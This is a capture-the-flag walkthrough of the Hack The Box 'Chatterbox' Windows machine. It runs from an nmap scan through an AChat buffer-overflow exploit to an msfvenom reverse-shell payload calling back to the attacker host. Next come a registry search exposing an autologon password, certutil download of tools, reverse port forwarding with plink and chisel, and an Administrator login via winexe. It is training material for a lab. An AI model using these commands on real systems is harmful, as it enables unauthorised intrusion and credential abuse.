Hackthebox - Chatterbox
Windows

Nmap
┌──(root💀kali)-[~]
└─# nmap -T4 -A -p- 10.10.10.74
Starting Nmap 7.92 ( https://nmap.org ) at 2022-04-02 07:47 EDT
Nmap scan report for 10.10.10.74
Host is up (0.022s latency).
Not shown: 65524 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
9255/tcp open http AChat chat system httpd
|_http-server-header: AChat
|_http-title: Site doesn't have a title.
9256/tcp open achat AChat chat system
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=4/2%OT=135%CT=1%CU=38815%PV=Y%DS=2%DC=T%G=Y%TM=6248383
OS:F%P=x86_64-pc-linux-gnu)SEQ(SP=F7%GCD=1%ISR=FE%TI=I%CI=I%II=I%SS=S%TS=7)
OS:OPS(O1=M505NW8ST11%O2=M505NW8ST11%O3=M505NW8NNT11%O4=M505NW8ST11%O5=M505
OS:NW8ST11%O6=M505ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)
OS:ECN(R=Y%DF=Y%T=80%W=2000%O=M505NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%
OS:F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=
OS:80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%
OS:Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=
OS:A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=
OS:Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%
OS:T=80%CD=Z)
Network Distance: 2 hops
Service Info: Host: CHATTERBOX; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 6h22m42s, deviation: 2h18m34s, median: 5h02m41s
| smb2-time:
| date: 2022-04-02T16:51:53
|_ start_date: 2022-04-02T16:29:48
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: <blank>
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Chatterbox
| NetBIOS computer name: CHATTERBOX\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-04-02T12:51:52-04:00
TRACEROUTE (using port 23/tcp)
HOP RTT ADDRESS
1 23.16 ms 10.10.14.1
2 23.35 ms 10.10.10.74
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 115.78 seconds
Initial access
AChat
With some research on this program it seems to be a buffer overflow, there's an exploit made for it here
Let's get the exploit on our machine
wget https://www.exploit-db.com/raw/36025
We just need to change the payload and do this instead because we want to get a reverse shell (not launch calc as the exploit payload is doing):
msfvenom -a x86 --platform Windows -p 'windows/shell_reverse_tcp' LHOST=10.10.14.4 LPORT=1234 -e x86/unicode_mixed -b '\x00\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff' BufferRegister=EAX -f python
Now we can replace the buffer in the exploit script with our buffer, we also need to change the server adress with the ip of the target
10.10.10.74
We launch the python script (wont work with python3 we need to use python2)
We get a shell
whoami
chatterbox\alfred
Let's get the user flag
cd C:\Users\Alfred\Desktop
type user.txt
Post Attack Enumeration
systeminfo
Host Name: CHATTERBOX
OS Name: Microsoft Windows 7 Professional
OS Version: 6.1.7601 Service Pack 1 Build 7601
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Multiprocessor Free
Registered Owner: Windows User
Registered Organization:
Product ID: 00371-222-9819843-86663
Original Install Date: 12/10/2017, 9:18:19 AM
System Boot Time: 4/2/2022, 12:29:38 PM
System Manufacturer: VMware, Inc.
System Model: VMware Virtual Platform
System Type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz
BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018
Windows Directory: C:\Windows
System Directory: C:\Windows\system32
Boot Device: \Device\HarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (UTC-05:00) Eastern Time (US & Canada)
Total Physical Memory: 2,047 MB
Available Physical Memory: 1,574 MB
Virtual Memory: Max Size: 4,095 MB
Virtual Memory: Available: 3,643 MB
Virtual Memory: In Use: 452 MB
Page File Location(s): C:\pagefile.sys
Domain: WORKGROUP
Logon Server: \\CHATTERBOX
[STRIPPED]
Network Card(s): 1 NIC(s) Installed.
[01]: Intel(R) PRO/1000 MT Network Connection
Connection Name: Local Area Connection 4
DHCP Enabled: No
IP address(es)
[01]: 10.10.10.74
net users
User accounts for \\CHATTERBOX
-------------------------------------------------------------------------------
Administrator Alfred Guest
The command completed successfully.
net localgroup
Aliases for \\CHATTERBOX
-------------------------------------------------------------------------------
*Administrators
*Backup Operators
*Cryptographic Operators
*Distributed COM Users
*Event Log Readers
*Guests
*IIS_IUSRS
*Network Configuration Operators
*Performance Log Users
*Performance Monitor Users
*Power Users
*Remote Desktop Users
*Replicator
*Users
The command completed successfully.
netstat -ano
Active Connections
Proto Local Address Foreign Address State PID
TCP 0.0.0.0:135 0.0.0.0:0 LISTENING 664
TCP 0.0.0.0:445 0.0.0.0:0 LISTENING 4
TCP 0.0.0.0:49152 0.0.0.0:0 LISTENING 356
TCP 0.0.0.0:49153 0.0.0.0:0 LISTENING 716
TCP 0.0.0.0:49154 0.0.0.0:0 LISTENING 904
TCP 0.0.0.0:49155 0.0.0.0:0 LISTENING 456
TCP 0.0.0.0:49156 0.0.0.0:0 LISTENING 1032
TCP 0.0.0.0:49157 0.0.0.0:0 LISTENING 464
TCP 10.10.10.74:139 0.0.0.0:0 LISTENING 4
TCP 10.10.10.74:9255 0.0.0.0:0 LISTENING 3100
TCP 10.10.10.74:9256 0.0.0.0:0 LISTENING 3100
TCP 10.10.10.74:49158 10.10.14.4:1234 ESTABLISHED 3100
TCP [::]:135 [::]:0 LISTENING 664
TCP [::]:445 [::]:0 LISTENING 4
TCP [::]:49152 [::]:0 LISTENING 356
TCP [::]:49153 [::]:0 LISTENING 716
TCP [::]:49154 [::]:0 LISTENING 904
TCP [::]:49155 [::]:0 LISTENING 456
TCP [::]:49156 [::]:0 LISTENING 1032
TCP [::]:49157 [::]:0 LISTENING 464
UDP 0.0.0.0:123 *:* 872
UDP 0.0.0.0:500 *:* 904
UDP 0.0.0.0:4500 *:* 904
UDP 0.0.0.0:5355 *:* 1104
UDP 10.10.10.74:137 *:* 4
UDP 10.10.10.74:138 *:* 4
UDP 10.10.10.74:1900 *:* 3384
UDP 10.10.10.74:9256 *:* 3100
UDP 10.10.10.74:59445 *:* 3384
UDP 127.0.0.1:1900 *:* 3384
UDP 127.0.0.1:59446 *:* 3384
UDP [::]:123 *:* 872
UDP [::]:500 *:* 904
UDP [::]:4500 *:* 904
UDP [::1]:1900 *:* 3384
UDP [::1]:59444 *:* 3384
The established connection is my reverse shell
On the top we see some local port that open including 445 which is smb so a share might be available locally
Let's check for passwords using this
findstr /si password *.txt *.ini *.config *.sql
- we do not seem to get anythingLet's try with the registry
reg query HKLM /f password /t REG_SZ /s
We get something interesting, we have a default password!
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
DefaultPassword REG_SZ Welcome1!
Let's check winlogon further
reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon"
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon
ReportBootOk REG_SZ 1
Shell REG_SZ explorer.exe
PreCreateKnownFolders REG_SZ {A520A1A4-1780-4FF6-BD18-167343C5AF16}
Userinit REG_SZ C:\Windows\system32\userinit.exe,
VMApplet REG_SZ SystemPropertiesPerformance.exe /pagefile
AutoRestartShell REG_DWORD 0x1
Background REG_SZ 0 0 0
CachedLogonsCount REG_SZ 10
DebugServerCommand REG_SZ no
ForceUnlockLogon REG_DWORD 0x0
LegalNoticeCaption REG_SZ
LegalNoticeText REG_SZ
PasswordExpiryWarning REG_DWORD 0x5
PowerdownAfterShutdown REG_SZ 0
ShutdownWithoutLogon REG_SZ 0
WinStationsDisabled REG_SZ 0
DisableCAD REG_DWORD 0x1
scremoveoption REG_SZ 0
ShutdownFlags REG_DWORD 0x11
DefaultDomainName REG_SZ
DefaultUserName REG_SZ Alfred
AutoAdminLogon REG_SZ 1
DefaultPassword REG_SZ Welcome1!
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\GPExtensions
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon\AutoLogonChecked
Let's try to use the password on the local smb, but first we need to do some port forwarding
We need to get plink in our attacking machine and transfer it to the target
wget https://the.earth.li/~sgtatham/putty/latest/w32/plink.exe
python3 -m http.server 80
In our target we browse to a directory where we have write access (Alfred's desktop for instamnce) and we get plink
certutil.exe -urlcache -f http://10.10.14.4/plink.exe plink.exe
We are going to launch ssh in our kali in our /etc/ssh/sshd_config PermitRootLogin should be set to yes
PermitRootLogin yes
service ssh start
Now we can port forward smb with plink from our target machine:
plink.exe -l root -pw your-kali-password-here -R 445:127.0.0.1:445 10.10.14.4
For more infor on this check out this article by UY
For some reason I am not able to connect to my own machine using ssh so I gonna try with chisel
On my kali
chisel server --reverse
(it going to listen on port 8080)On the target
.\chisel.exe client 10.10.14.4:8080 R:445:127.0.0.1:445
It seems to work
Now we can use winexe from our machine and connect with administrator using the discovered password
winexe -U Administrator%Welcome1! //127.0.0.1 "cmd.exe"
And we get a root shell!
And we can grab the root flag
Last updated